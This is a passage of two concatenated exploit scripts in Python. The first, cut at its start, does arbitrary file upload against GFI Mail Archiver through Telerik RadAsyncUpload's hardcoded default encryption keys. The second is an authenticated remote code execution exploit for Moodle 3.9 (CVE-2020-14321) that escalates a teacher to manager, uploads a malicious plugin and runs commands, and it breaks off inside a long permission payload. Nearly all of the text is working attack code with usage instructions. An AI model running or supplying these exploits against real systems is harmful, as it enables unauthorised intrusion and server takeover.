SHA1.new()) result = [] for b in range(1, -(-result_length // PBKDF.mac.digest_size) + 1): rv = u = PBKDF.hmacsha1(salt.encode() + Struct('>i').pack(b)) for i in range(999): u = PBKDF.hmacsha1(u) rv = starmap(xor, zip(rv, u)) result.extend(rv) result = b''.join(map(bytes, [result]))[:result_length] return result def derive(type, password,salt = ''.join(chr(i) for i in [58, 84, 91, 25, 10, 34, 29, 68, 60, 88, 44, 51, 1])): if type == 1: result = PBKDF.derive1(password, salt) result = result[0:32] + result[8:16] + result[40:48] # Bizarre hack elif type == 2: result = PBKDF.derive2(password, salt) return result[0:32], result[32:] class RAUCipher: # ****************************************** # ****************************************** # ADVANCED_SETTINGS section 2 of 2 # Default settings are for vulnerable versions before 2017 patches with default keys T_Upload_ConfigurationHashKey = \ "PrivateKeyForHashOfUploadConfiguration" # Default hardcoded key for versions before 2017 patches HASHKEY = T_Upload_ConfigurationHashKey # or your custom hashkey T_AsyncUpload_ConfigurationEncryptionKey = \ "PrivateKeyForEncryptionOfRadAsyncUploadConfiguration" # Default hardcoded key for versions before 2017 patches PASSWORD = T_AsyncUpload_ConfigurationEncryptionKey # or your custom password # Latest tested version working with this setting: 2018.1.117 # Probably working up to and including 2018.3.910 PBKDF_ALGORITHM = 1 # Earliest tested version working with this setting: 2019.2.514 # Probably introduced 2019.1.115 # PBKDF_ALGORITHM = 2 # ****************************************** # ****************************************** key, iv = PBKDF.derive(PBKDF_ALGORITHM, PASSWORD) # print(binascii.hexlify(key).decode().upper()) # print(binascii.hexlify(iv).decode().upper()) def encrypt(plaintext): sys.stderr.write("Encrypting... ") encoded = "" for i in plaintext: encoded = encoded + i + "\x00" plaintext = encoded + ( chr(16 - (len(encoded) % 16)) * (16 - (len(encoded) % 16)) ) cipher = AES.new(RAUCipher.key, AES.MODE_CBC, RAUCipher.iv) sys.stderr.write("done\n") return base64.b64encode(cipher.encrypt(plaintext.encode())).decode() def decrypt(ciphertext): sys.stderr.write("Decrypting... ") ciphertext = base64.b64decode(ciphertext) cipher = AES.new(RAUCipher.key, AES.MODE_CBC, RAUCipher.iv) unpad = lambda s: s[0:-ord(chr(s[-1]))] sys.stderr.write("done\n") return unpad(cipher.decrypt(ciphertext)).decode()[0::2] def addHmac(string, Version): isHmacVersion = False # "Encrypt-then-MAC" feature introduced in R1 2017 # Required for >= "2017.1.118" (e.g. "2017.1.118", "2017.1.228", "2017.2.503" etc.) if int(Version[:4]) >= 2017: isHmacVersion = True hmac = HMAC.new( bytes(RAUCipher.HASHKEY.encode()), string.encode(), SHA256.new() ) hmac = base64.b64encode(hmac.digest()).decode() return string + hmac if isHmacVersion else string def getProxy(proxy): return { "http" : proxy, "https" : proxy } def rauPostData_enc(partA, partB): data = "-----------------------------62616f37756f2f\r\n" data += "Content-Disposition: form-data; name=\"rauPostData\"\r\n" data += "\r\n" data += RAUCipher.encrypt(partA) + "&" + RAUCipher.encrypt(partB) + "\r\n" return data def rauPostData_prep(TempTargetFolder, Version): TargetFolder = RAUCipher.addHmac( RAUCipher.encrypt(""), Version ) TempTargetFolder = RAUCipher.addHmac( RAUCipher.encrypt(TempTargetFolder), Version ) partA = \ '{"TargetFolder":"' + TargetFolder + '","TempTargetFolder":"' + \ TempTargetFolder + \ '","MaxFileSize":0,"TimeToLive":{"Ticks":1440000000000,"Days":0,"Hours":40,"Minutes":0,"Seconds":0,"Milliseconds":0,"TotalDays":1.6666666666666666,"TotalHours":40,"TotalMinutes":2400,"TotalSeconds":144000,"TotalMilliseconds":144000000},"UseApplicationPoolImpersonation":false}' partB = \ "Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=" + \ Version + ", Culture=neutral, PublicKeyToken=121fae78165ba3d4" return rauPostData_enc(partA, partB) def payload(TempTargetFolder, Version, payload_filename): sys.stderr.write("Local file path: " + payload_filename + "\n") payload_filebasename = os.path.basename(payload_filename) sys.stderr.write("Destination file name: " + payload_filebasename + "\n") sys.stderr.write("Destination path: " + TempTargetFolder + "\n") sys.stderr.write("Version: " + Version + "\n") sys.stderr.write("Preparing payload... \n") payload_file = open(payload_filename, "rb") payload_file_data = payload_file.read() payload_file.close() data = rauPostData_prep(TempTargetFolder, Version) data += "-----------------------------62616f37756f2f\r\n" data += "Content-Disposition: form-data; name=\"file\"; filename=\"blob\"\r\n" data += "Content-Type: application/octet-stream\r\n" data += "\r\n" data += payload_file_data.decode("raw_unicode_escape") + "\r\n" data += "-----------------------------62616f37756f2f\r\n" data += "Content-Disposition: form-data; name=\"fileName\"\r\n" data += "\r\n" data += "RAU_crypto.bypass\r\n" data += "-----------------------------62616f37756f2f\r\n" data += "Content-Disposition: form-data; name=\"contentType\"\r\n" data += "\r\n" data += "text/html\r\n" data += "-----------------------------62616f37756f2f\r\n" data += "Content-Disposition: form-data; name=\"lastModifiedDate\"\r\n" data += "\r\n" data += "2019-01-02T03:04:05.067Z\r\n" data += "-----------------------------62616f37756f2f\r\n" data += "Content-Disposition: form-data; name=\"metadata\"\r\n" data += "\r\n" data += "{\"TotalChunks\":1,\"ChunkIndex\":0,\"TotalFileSize\":1,\"UploadID\":\"" + \ payload_filebasename + "\"}\r\n" data += "-----------------------------62616f37756f2f--\r\n" data += "\r\n" sys.stderr.write("Payload prep done\n") return data def upload(data, url, proxy = False): global CERT_VERIFY sys.stderr.write("Preparing to send request to " + url + "\n") session = requests.Session() request = requests.Request( "POST", url, data=data ) request = request.prepare() request.headers["Content-Type"] = \ "multipart/form-data; " +\ "boundary=---------------------------62616f37756f2f" response = session.send(request, verify=CERT_VERIFY, proxies = getProxy(proxy)) sys.stderr.write("Request done\n") return response.text def decode_rauPostData(rauPostData): rauPostData = rauPostData.split("&") rauJSON = RAUCipher.decrypt(rauPostData[0]) decoded = "\nJSON: " + rauJSON + "\n" TempTargetFolder = json.loads(rauJSON)["TempTargetFolder"] decoded = decoded + "\nTempTargetFolder = " + \ RAUCipher.decrypt(TempTargetFolder) + "\n" rauVersion = RAUCipher.decrypt(rauPostData[1]) decoded = decoded + "\nVersion: " + rauVersion + "\n" return decoded def mode_decrypt(): # decrypt ciphertext ciphertext = sys.argv[2] print("\n" + RAUCipher.decrypt(ciphertext) + "\n") def mode_Decrypt_rauPostData(): # decrypt rauPostData rauPostData = sys.argv[2] print(decode_rauPostData(rauPostData)) def mode_encrypt(): # encrypt plaintext plaintext = sys.argv[2] print("\n" + RAUCipher.encrypt(plaintext) + "\n") def mode_Encrypt_rauPostData(): # encrypt rauPostData based on TempTargetFolder and Version TempTargetFolder = sys.argv[2] Version = sys.argv[3] print( "rauPostData: " + rauPostData_prep(TempTargetFolder, Version) + "\n" ) def mode_payload(): # generate a payload based on TempTargetFolder, Version and payload file TempTargetFolder = sys.argv[2] Version = "2013.1.417.40" payload_filename = sys.argv[4] print("Content-Type: multipart/form-data; boundary=---------------------------62616f37756f2f") print(payload(TempTargetFolder, Version, payload_filename)) def mode_Post(proxy = False): # generate and upload a payload based on # TempTargetFolder, Version, payload file and url Version = "2013.1.417.40" url = sys.argv[2] + "/Telerik.Web.UI.WebResource.axd?type=rau" payload_filename = sys.argv[4] TempTargetFolder = sys.argv[6] print(upload(payload(TempTargetFolder, Version, payload_filename), url, proxy)) print("\n[+] Check your uploaded file\n"); def mode_help(): print( "Usage: \nExample1: python3 gfipwn.py -u http://[host]/Archiver/ -f filetoupload -p 'C:\\Program Files\\GFI\\Archiver\\ASPNET\\UI\\Images\\' \nExample2: python3 gfipwn.py -u http://[host]/Archiver/ -f filetoupload -p 'C:\\Windows\\Temp'") sys.stderr.write("\n[+] Original Research by Paul Taylor / @bao7uo \n[+] Modified by Amin Bohio\n") sys.stderr.write("[+] GFI Mail Archiver <= 15.1 - Telerik Arbitrary File Upload\n\n") if len(sys.argv) < 2: mode_help() elif sys.argv[1] == "-u" and len(sys.argv) == 7: mode_Post() else: mode_help()

# Exploit Title: Moodle 3.9 - Remote Code Execution (RCE) (Authenticated) # Date: 12-05-2021 # Exploit Author: lanz # Vendor Homepage: https://moodle.org/ # Version: Moodle 3.9 # Tested on: FreeBSD #!/usr/bin/python3 ## Moodle 3.9 - RCE (Authenticated as teacher) ## Based on PoC and Payload to assign full permissions to manager rol: ## * https://github.com/HoangKien1020/CVE-2020-14321 ## Repository: https://github.com/lanzt/CVE-2020-14321/blob/main/CVE-2020-14321_RCE.py import string, random import requests, re import argparse import base64 import signal import time from pwn import * class Color: BLUE = '\033[94m' GREEN = '\033[92m' YELLOW = '\033[93m' RED = '\033[91m' END = '\033[0m' def def_handler(sig, frame): print(Color.RED + "\n[!] 3xIt1ngG...\n") exit(1) signal.signal(signal.SIGINT, def_handler) banner = base64.b64decode("IF9fICAgICBfXyAgICAgX18gICBfXyAgX18gICBfXyAgICAgICAgICAgICAgX18gIF9fICAgICAKLyAgXCAgL3xfICBfXyAgIF8pIC8gIFwgIF8pIC8gIFwgX18gIC98IHxfX3wgIF8pICBfKSAvfCAKXF9fIFwvIHxfXyAgICAgL19fIFxfXy8gL19fIFxfXy8gICAgICB8ICAgIHwgX18pIC9fXyAgfCDigKIgYnkgbGFuegoKTW9vZGxlIDMuOSAtIFJlbW90ZSBDb21tYW5kIEV4ZWN1dGlvbiAoQXV0aGVudGljYXRlZCBhcyB0ZWFjaGVyKQpDb3Vyc2UgZW5yb2xtZW50cyBhbGxvd2VkIHByaXZpbGVnZSBlc2NhbGF0aW9uIGZyb20gdGVhY2hlciByb2xlIGludG8gbWFuYWdlciByb2xlIHRvIFJDRQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA==").decode() print(Color.BLUE + banner + Color.END) def usagemybro(): fNombre = os.path.basename(__file__) ussage = fNombre + ' [-h] [-u USERNAME] [-p PASSWORD] [-idm ID_MANAGER] [-idc ID_COURSE] [-c COMMAND] [--cookie TEACHER_COOKIE] url\n\n' ussage += '[+] Examples:\n' ussage += '\t' + fNombre + ' http://moodle.site.com/moodle -u teacher_name -p teacher_pass\n' ussage += '\t' + fNombre + " http://moodle.site.com/moodle --cookie thisistheffcookieofmyteaaacher\n" return ussage def arguments(): parse = argparse.ArgumentParser(usage=usagemybro()) parse.add_argument(dest='url', type=str, help='URL Moodle site') parse.add_argument('-u', dest='username', type=str, default='lanz', help='Teacher username, default: lanz') parse.add_argument('-p', dest='password', type=str, default='Lanz123$!', help='Teacher password, default: Lanz123$!') parse.add_argument('-idm', dest='id_manager', type=str, default='25', help='Manager user ID, default: 25') parse.add_argument('-idc', dest='id_course', type=str, default='5', help='Course ID valid to enrol yourself, default: 5') parse.add_argument('-c', dest='command', type=str, default='whoami', help='Command to execute, default: whoami') parse.add_argument('--cookie', dest='teacher_cookie', type=str, default='', help='Teacher cookie (if you don\'t have valid credentials)') return parse.parse_args() def login(url, username, password, course_id, teacher_cookie): ''' Sign in on site, with creds or with cookie ''' p1 = log.progress("Login on site") session = requests.Session() r = session.get(url + '/login/index.php') # Sign in with teacher cookie if teacher_cookie != "": p1.status("Cookie " + Color.BLUE + "MoodleSession:" + teacher_cookie + Color.END) time.sleep(2) # In case the URL format is: http://moodle.site.com/moodle cookie_domain = url.split('/')[2] # moodle.site.com cookie_path = "/%s/" % (url.split('/')[3]) # /moodle/ session.cookies.set('MoodleSession', teacher_cookie, domain=cookie_domain, path=cookie_path) r = session.get(url + '/user/index.php', params={"id":course_id}) try: re.findall(r'class="usertext mr-1">(.*?)<', r.text)[0] except IndexError: p1.failure(Color.RED + "✘" + Color.END) print(Color.RED + "\nInvalid cookie, try again, verify cookie domain and cookie path or simply change all.\n") exit(1) id_user = re.findall(r'id="nav-notification-popover-container" data-userid="(.*?)"', r.text)[0] sess_key = re.findall(r'"sesskey":"(.*?)"', r.text)[0] p1.success(Color.BLUE + "MoodleSession:" + teacher_cookie + Color.END + Color.YELLOW + " ✓" + Color.END) time.sleep(1) # Sign in with teacher credentials elif username and password != "": p1.status("Creds " + Color.BLUE + username + ":" + password + Color.END) time.sleep(2) login_token = re.findall(r'name="logintoken" value="(.*?)"', r.text)[0] data_post = { "anchor" : "", "logintoken" : login_token, "username" : username, "password" : password } r = session.post(url + '/login/index.php', data=data_post) if "Recently accessed courses" not in r.text: p1.failure(Color.RED + "✘" + Color.END) print(Color.RED + "\nInvalid credentials.\n") exit(1) id_user = re.findall(r'id="nav-notification-popover-container" data-userid="(.*?)"', r.text)[0] sess_key = re.findall(r'"sesskey":"(.*?)"', r.text)[0] p1.success(Color.BLUE + username + ":" + password + Color.END + Color.YELLOW + " ✓" + Color.END) time.sleep(1) else: print(Color.RED + "\nUse valid credentials or valid cookie\n") exit(1) return session, id_user, sess_key def enrol2rce(session, url, id_manager, username, course_id, teacher_cookie, command): ''' Assign rol manager to teacher and manager account in the course. ''' p4 = log.progress("Updating roles to move on manager accout") time.sleep(1) r = session.get(url + '/user/index.php', params={"id":course_id}) try: teacher_user = re.findall(r'class="usertext mr-1">(.*?)<', r.text)[0] except IndexError: p4.failure(Color.RED + "✘" + Color.END) print(Color.RED + "\nInvalid cookie, try again, verify cookie domain and cookie path or simply change all.\n") exit(1) p4.status("Teacher " + Color.BLUE + teacher_user + Color.END) time.sleep(1) id_user = re.findall(r'id="nav-notification-popover-container" data-userid="(.*?)"', r.text)[0] sess_key = re.findall(r'"sesskey":"(.*?)"', r.text)[0] session = update_rol(session, url, sess_key, course_id, id_user) session = update_rol(session, url, sess_key, course_id, id_manager) data_get = { "id" : course_id, "user" : id_manager, "sesskey" : sess_key } r = session.get(url + '/course/loginas.php', params=data_get) if "You are logged in as" not in r.text: p4.failure(Color.RED + "✘" + Color.END) print(Color.RED + "\nError trying to move on manager account. Validate credentials (or cookie).\n") exit(1) p4.success(Color.YELLOW + "✓" + Color.END) time.sleep(1) sess_key = re.findall(r'"sesskey":"(.*?)"', r.text)[0] # Updating rol manager to enable install plugins session, sess_key = update_rol_manager(session, url, sess_key) # Upload malicious zip file zipb64_up(session, url, sess_key, teacher_user, course_id) # RCE on system moodle_RCE(url, command) def update_rol(session, url, sess_key, course_id, id_user): ''' Updating teacher rol to enable he update other users ''' data_get = { "mform_showmore_main" : "0", "id" : course_id, "action" : "enrol", "enrolid" : "10", "sesskey" : sess_key, "_qf__enrol_manual_enrol_users_form" : "1", "mform_showmore_id_main" : "0", "userlist[]" : id_user, "roletoassign" : "1", "startdate" : "4", "duration" : "" } r = session.get(url + '/enrol/manual/ajax.php', params=data_get) return session def update_rol_manager(session, url, sess_key): ''' Updating rol manager to enable install plugins * Extracted from: https://github.com/HoangKien1020/CVE-2020-14321 ''' p6 = log.progress("Updating rol manager to enable install plugins") time.sleep(1) data_get = { "action":"edit", "roleid":"1" } random_desc = ''.join(random.choice(string.ascii_lowercase) for i in range(15)) # Headache part :P data_post = [('sesskey',sess_key),('return','manage'),('resettype','none'),('shortname','manager'),('name',''),('description',random_desc),('archetype','manager'),('contextlevel10','0'),('contextlevel10','1'),('contextlevel30','0'),('contextlevel30','1'),('contextlevel40','0'),('contextlevel40','1'),('contextlevel50','0'),('contextlevel50','1'),('contextlevel70','0'),('contextlevel70','1'),('contextlevel80','0'),('contextlevel80','1'),('allowassign[]',''),('allowassign[]','1'),('allowassign[]','2'),('allowassign[]','3'),('allowassign[]','4'),('allowassign[]','5'),('allowassign[]','6'),('allowassign[]','7'),('allowassign[]','8'),('allowoverride[]',''),('allowoverride[]','1'),('allowoverride[]','2'),('allowoverride[]','3'),('allowoverride[]','4'),('allowoverride[]','5'),('allowoverride[]','6'),('allowoverride[]','7'),('allowoverride[]','8'),('allowswitch[]',''),('allowswitch[]','1'),('allowswitch[]','2'),('allowswitch[]','3'),('allowswitch[]','4'),('allowswitch[]','5'),('allowswitch[]','6'),('allowswitch[]','7'),('allowswitch[]','8'),('allowview[]',''),('allowview[]','1'),('allowview[]','2'),('allowview[]','3'),('allowview[]','4'),('allowview[]','5'),('allowview[]','6'),('allowview[]','7'),('allowview[]','8'),('block/admin_bookmarks:myaddinstance','1'),('block/badges:myaddinstance','1'),('block/calendar_month:myaddinstance','1'),('block/calendar_upcoming:myaddinstance','1'),('block/comments:myaddinstance','1'),('block/course_list:myaddinstance','1'),('block/globalsearch:myaddinstance','1'),('block/glossary_random:myaddinstance','1'),('block/html:myaddinstance','1'),('block/lp:addinstance','1'),('block/lp:myaddinstance','1'),('block/mentees:myaddinstance','1'),('block/mnet_hosts:myaddinstance','1'),('block/myoverview:myaddinstance','1'),('block/myprofile:myaddinstance','1'),('block/navigation:myaddinstance','1'),('block/news_items:myaddinstance','1'),('block/online_users:myaddinstance','1'),('block/private_files:myaddinstance','1'),('block/recentlyaccessedcourses:myaddinstance','1'),('block/recentlyaccesseditems:myaddinstance','1'),('block/rss_client:myaddinstance','1'),('block/settings:myaddinstance','1'),('block/starredcourses:myaddinstance','1'),('block/tags:myaddinstance','1'),('block/timeline:myaddinstance','1'),('enrol/category:synchronised','1'),('message/airnotifier:managedevice','1'),('moodle/analytics:listowninsights','1'),('moodle/analytics:managemodels','1'),('moodle/badges:manageglobalsettings','1'),('moodle/blog:create','1'),('moodle/blog:manageentries','1'),('moodle/blog:manageexternal','1'),('moodle/blog:search','1'),('moodle/blog:view','1'),('moodle/blog:viewdrafts','1'),('moodle/course:configurecustomfields','1'),('moodle/course:recommendactivity','1'),('moodle/grade:managesharedforms','1'),('moodle/grade:sharegradingforms','1'),('moodle/my:configsyspages','1'),('moodle/my:manageblocks','1'),('moodle/portfolio:export','1'),('moodle/question:config','1'),('moodle/restore:createuser','1'),('moodle/role:manage','1'),('moodle/search:query','1'),('moodle/site:config','1'),('moodle/site:configview','1'),('moodle/site:deleteanymessage','1'),('moodle/site:deleteownmessage','1'),('moodle/site:doclinks','1'),('moodle/site:forcelanguage','1'),('moodle/site:maintenanceaccess','1'),('moodle/site:manageallmessaging','1'),('moodle/site:messageanyuser','1'),('moodle/site:mnetlogintoremote','1'),('moodle/site:readallmessages','1'),('moodle/site:sendmessage','1'),('moodle/site:uploadusers','1'),('moodle/site:viewparticipants','1'),('moodle/tag:edit','1'),('moodle/tag:editblocks','1'),('moodle/tag:flag','1'),('moodle/tag:manage','1'),('moodle/user:changeownpassword','1'),('moodle/user:create','1'),('moodle/user:delete','1'),('moodle/user:editownmessageprofile','1'),('moodle/user:editownprofile','1'),('moodle/user:ignoreuserquota','1'),('moodle/user:manageownblocks','1'),('moodle/user:manageownfiles','1'),('moodle/user:managesyspages','1'),('moodle/user:update','1'),('moodle/webservice:createmobiletoken','1'),('moodle/webservice:createtoken','1'),('moodle/webservice:managealltokens','1'),('quizaccess/seb:managetemplates','1'),('report/courseoverview:view','1'),('report/performance:view','1'),('report/questioninstances:view','1'),('report/security:view','1'),('report/status:view','1'),('tool/customlang:edit','1'),('tool/customlang:view','1'),('tool/dataprivacy:managedataregistry','1'),('tool/dataprivacy:managedatarequests','1'),('tool/dataprivacy:requestdeleteforotheruser','1'),('tool/lpmigrate:frameworksmigrate','1'),('tool/monitor:managetool','1'),('tool/policy:accept','1'),('tool/policy:managedocs','1'),('tool/policy:viewacceptances','1'),('tool/uploaduser:uploaduserpictures','1'),('tool/usertours:managetours','1'),('auth/oauth2:managelinkedlogins','1'),('moodle/badges:manageownbadges','1'),('moodle/badges:viewotherbadges','1'),('moodle/competency:evidencedelete','1'),('moodle/competency:plancomment','1'),('moodle/competency:plancommentown','1'),('moodle/competency:planmanage','1'),('moodle/competency:planmanagedraft','1'),('moodle/competency:planmanageown','1'),('moodle/competency:planmanageowndraft','1'),('moodle/competency:planrequestreview','1'),('moodle/competency:planrequestreviewown','1'),('moodle/competency:planreview','1'),('moodle/competency:planview','1'),('moodle/competency:planviewdraft','1'),('moodle/competency:planviewown','1'),('moodle/competency:planviewowndraft','1'),('moodle/competency:usercompetencycomment','1'),('moodle/competency:usercompetencycommentown','1'),('moodle/competency:usercompetencyrequestreview','1'),('moodle/competency:usercompetencyrequestreviewown','1'),('moodle/competency:usercompetencyreview','1'),('moodle/competency:usercompetencyview','1'),('moodle/competency:userevidencemanage','1'),('moodle/competency:userevidencemanageown','0'),('moodle/competency:userevidenceview','1'),('moodle/user:editmessageprofile','1'),('moodle/user:editprofile','1'),('moodle/user:manageblocks','1'),('moodle/user:readuserblogs','1'),('moodle/user:readuserposts','1'),('moodle/user:viewalldetails','1'),('moodle/user:viewlastip','1'),('moodle/user:viewuseractivitiesreport','1'),('report/usersessions:manageownsessions','1'),('tool/dataprivacy:downloadallrequests','1'),('tool/dataprivacy:downloadownrequest','1'),('tool/dataprivacy:makedatadeletionrequestsforchildren','1'),('tool/dataprivacy:makedatarequestsforchildren','1'),('tool/dataprivacy:requestdelete','1'),('tool/policy:acceptbehalf','1'),('moodle/category:manage','1'),('moodle/category:viewcourselist','1'),('moodle/category:viewhiddencategories','1'),('moodle/cohort:assign','1'),('moodle/cohort:manage','1'),('moodle/competency:competencymanage','1'),('moodle/competency:competencyview','1'),('moodle/competency:templatemanage','1'),('moodle/competency:templateview','1'),('moodle/course:create','1'),('moodle/course:request','1'),('moodle/site:approvecourse','1'),('repository/contentbank:accesscoursecategorycontent','1'),('repository/contentbank:accessgeneralcontent','1'),('block/recent_activity:viewaddupdatemodule','1'),('block/recent_activity:viewdeletemodule','1'),('contenttype/h5p:access','1'),('contenttype/h5p:upload','1'),('contenttype/h5p:useeditor','1'),('enrol/category:config','1'),('enrol/cohort:config','1'),('enrol/cohort:unenrol','1'),('enrol/database:config','1'),('enrol/database:unenrol','1'),('enrol/flatfile:manage','1'),('enrol/flatfile:unenrol','1'),('enrol/guest:config','1'),('enrol/imsenterprise:config','1'),('enrol/ldap:manage','1'),('enrol/lti:config','1'),('enrol/lti:unenrol','1'),('enrol/manual:config','1'),('enrol/manual:enrol','1'),('enrol/manual:manage','1'),('enrol/manual:unenrol','1'),('enrol/manual:unenrolself','1'),('enrol/meta:config','1'),('enrol/meta:selectaslinked','1'),('enrol/meta:unenrol','1'),('enrol/mnet:config','1'),('enrol/paypal:config','1'),('enrol/paypal:manage','1'),('enrol/paypal:unenrol','1'),('enrol/paypal:unenrolself','1'),('enrol/self:config','1'),('enrol/self:holdkey','1'),('enrol/self:manage','1'),('enrol/self:unenrol','1'),('enrol/self:unenrolself','1'),('gradeexport/ods:publish','1'),('gradeexport/ods:view','1'),('gradeexport/txt:publish','1'),('gradeexport/txt:view','1'),('gradeexport/xls:publish','1'),('gradeexport/xls:view','1'),('gradeexport/xml:publish','1'),('gradeexport/xml:view','1'),('gradeimport/csv:view','1'),('gradeimport/direct:view','1'),('gradeimport/xml:publish','1'),('gradeimport/xml:view','1'),('gradereport/grader:view','1'),('gradereport/history:view','1'),('gradereport/outcomes:view','1'),('gradereport/overview:view','1'),('gradereport/singleview:view','1'),('gradereport/user:view','1'),('mod/assign:addinstance','1'),('mod/assignment:addinstance','1'),('mod/book:addinstance','1'),('mod/chat:addinstance','1'),('mod/choice:addinstance','1'),('mod/data:addinstance','1'),('mod/feedback:addinstance','1'),('mod/folder:addinstance','1'),('mod/forum:addinstance','1'),('mod/glossary:addinstance','1'),('mod/h5pactivity:addinstance','1'),('mod/imscp:addinstance','1'),('mod/label:addinstance','1'),('mod/lesson:addinstance','1'),('mod/lti:addcoursetool','1'),('mod/lti:addinstance','1'),('mod/lti:addmanualinstance','1'),('mod/lti:addpreconfiguredinstance','1'),('mod/lti:requesttooladd','1'),('mod/page:addinstance','1'),('mod/quiz:addinstance','1'),('mod/resource:addinstance','1'),('mod/scorm:addinstance','1'),('mod/survey:addinstance','1'),('mod/url:addinstance','1'),('mod/wiki:addinstance','1'),('mod/workshop:addinstance','1'),('moodle/analytics:listinsights','1'),('moodle/backup:anonymise','1'),('moodle/backup:backupcourse','1'),('moodle/backup:backupsection','1'),('moodle/backup:backuptargetimport','1'),('moodle/backup:configure','1'),('moodle/backup:downloadfile','1'),('moodle/backup:userinfo','1'),('moodle/badges:awardbadge','1'),('moodle/badges:configurecriteria','1'),('moodle/badges:configuredetails','1'),('moodle/badges:configuremessages','1'),('moodle/badges:createbadge','1'),('moodle/badges:deletebadge','1'),('moodle/badges:earnbadge','1'),('moodle/badges:revokebadge','1'),('moodle/badges:viewawarded','1'),('moodle/badges:viewbadges','1'),('moodle/calendar:manageentries','1'),('moodle/calendar:managegroupentries','1'),('moodle/calendar:manageownentries','1'),('moodle/cohort:view','1'),('moodle/comment:delete','1'),('moodle/comment:post','1'),('moodle/comment:view','1'),('moodle/competency:competencygrade','1'),('moodle/competency:coursecompetencygradable','1'),('moodle/competency:coursecompetencymanage','1'),('moodle/competency:coursecompetencyview','1'),('moodle/contentbank:access','1'),('moodle/contentbank:deleteanycontent','1'),('moodle/contentbank:deleteowncontent','1'),('moodle/contentbank:manageanycontent','1'),('moodle/contentbank:manageowncontent','1'),('moodle/contentbank:upload','1'),('moodle/contentbank:useeditor','1'),('moodle/course:bulkmessaging','1'),('moodle/course:changecategory','1'),('moodle/course:changefullname','1'),('moodle/course:changeidnumber','1'),('moodle/course:changelockedcustomfields','1'),('moodle/course:changeshortname','1'),('moodle/course:changesummary','1'),('moodle/course:creategroupconversations','1'),('moodle/course:delete','1'),('moodle/course:enrolconfig','1'),('moodle/course:enrolreview','1'),('moodle/course:ignorefilesizelimits','1'),('moodle/course:isincompletionreports','1'),('moodle/course:managefiles','1'),('moodle/course:managegroups','1'),('moodle/course:managescales','1'),('moodle/course:markcomplete','1'),('moodle/course:movesections','1'),('moodle/course:overridecompletion','1'),('moodle/course:renameroles','1'),('moodle/course:reset','1'),('moodle/course:reviewotherusers','1'),('moodle/course:sectionvisibility','1'),('moodle/course:setcurrentsection','1'),('moodle/course:setforcedlanguage','1'),('moodle/course:tag','1'),('moodle/course:update','1'),('moodle/course:useremail','1'),('moodle/course:view','1'),('moodle/course:viewhiddencourses','1'),('moodle/course:viewhiddensections','1'),('moodle/course:viewhiddenuserfields','1'),('moodle/course:viewparticipants','1'),('moodle/course:viewscales','1'),('moodle/course:viewsuspendedusers','1'),('moodle/course:visibility','1'),('moodle/filter:manage','1'),('moodle/grade:edit','1'),('moodle/grade:export','1'),('moodle/grade:hide','1'),('moodle/grade:import','1'),('moodle/grade:lock','1'),('moodle/grade:manage','1'),('moodle/grade:managegradingforms','1'),('moodle/grade:manageletters','1'),('moodle/grade:manageoutcomes','1'),('moodle/grade:unlock','1'),('moodle/grade:view','1'),('moodle/grade:viewall','1'),('moodle/grade:viewhidden','1'),('moodle/notes:manage','1'),('moodle/notes:view','1'),('moodle/question:add','1'),('moodle/question:editall','1'),('moodle/question:editmine','1'),('moodle/question:flag','1'),('moodle/question:managecategory','1'),('moodle/question:moveall','1'),('moodle/question:movemine','1'),('moodle/question:tagall','1'),('moodle/question:tagmine','1'),('moodle/question:useall','1'),('moodle/question:usemine','1'),('moodle/question:viewall','1'),('moodle/question:viewmine','1'),('moodle/rating:rate','1'),('moodle/rating:view','1'),('moodle/rating:viewall','1'),('moodle/rating:viewany','1'),('moodle/restore:configure','1'),('moodle/restore:restoreactivity','1'),('moodle/restore:restorecourse','1'),('moodle/restore:restoresection','1'),('moodle/restore:restoretargetimport','1'),('moodle/restore:rolldates','1'),('moodle/restore:uploadfile','1'),('moodle/restore:userinfo','1'),('moodle/restore:viewautomatedfilearea','1'),('moodle/role:assign','1'),('moodle/role:override','1'),('moodle/role:review','1'),('moodle/role:safeoverride','1'),('moodle/role:switchroles','1'),('moodle/site:viewreports','1'),('moodle/user:loginas','1'),('moodle/user:viewdetails','1'),('moodle/user:viewhiddendetails','1'),('report/completion:view','1'),('report/log:view','1'),('report/log:viewtoday','1'),('report/loglive:view','1'),('report/outline:view','1'),('report/outline:viewuserreport','1'),('report/participation:view','1'),('report/progress:view','1'),('report/stats:view','1'),('repository/contentbank:accesscoursecontent','1'),('tool/monitor:managerules','1'),('tool/monitor:subscribe','1'),('tool/recyclebin:deleteitems','1'),('tool/recyclebin:restoreitems','1'),('tool/recyclebin:viewitems','1'),('webservice/rest:use','1'),('webservice/soap:use','1'),('webservice/xmlrpc:use','1'),('atto/h5p:addembed','1'),('atto/recordrtc:recordaudio','1'),('atto/recordrtc:recordvideo','1'),('booktool/exportimscp:export','1'),('booktool/importhtml:import','1'),('booktool/print:print','1'),('forumreport/summary:view','1'),('forumreport/summary:viewall','1'),('mod/assign:editothersubmission','1'),('mod/assign:exportownsubmission','1'),('mod/assign:grade','1'),('mod/assign:grantextension','1'),('mod/assign:manageallocations','1'),('mod/assign:managegrades','1'),('mod/assign:manageoverrides','1'),('mod/assign:receivegradernotifications','1'),('mod/assign:releasegrades','1'),('mod/assign:revealidentities','1'),('mod/assign:reviewgrades','1'),('mod/assign:showhiddengrader','1'),('mod/assign:submit','1'),('mod/assign:view','1'),('mod/assign:viewblinddetails','1'),('mod/assign:viewgrades','1'),('mod/assignment:exportownsubmission','1'),('mod/assignment:grade','1'),('mod/assignment:submit','1'),('mod/assignment:view','1'),('mod/book:edit','1'),('mod/book:read','1'),('mod/book:viewhiddenchapters','1'),('mod/chat:chat','1'),('mod/chat:deletelog','1'),('mod/chat:exportparticipatedsession','1'),('mod/chat:exportsession','1'),('mod/chat:readlog','1'),('mod/chat:view','1'),('mod/choice:choose','1'),('mod/choice:deleteresponses','1'),('mod/choice:downloadresponses','1'),('mod/choice:readresponses','1'),('mod/choice:view','1'),('mod/data:approve','1'),('mod/data:comment','1'),('mod/data:exportallentries','1'),('mod/data:exportentry','1'),('mod/data:exportownentry','1'),('mod/data:exportuserinfo','1'),('mod/data:managecomments','1'),('mod/data:manageentries','1'),('mod/data:managetemplates','1'),('mod/data:manageuserpresets','1'),('mod/data:rate','1'),('mod/data:view','1'),('mod/data:viewallratings','1'),('mod/data:viewalluserpresets','1'),('mod/data:viewanyrating','1'),('mod/data:viewentry'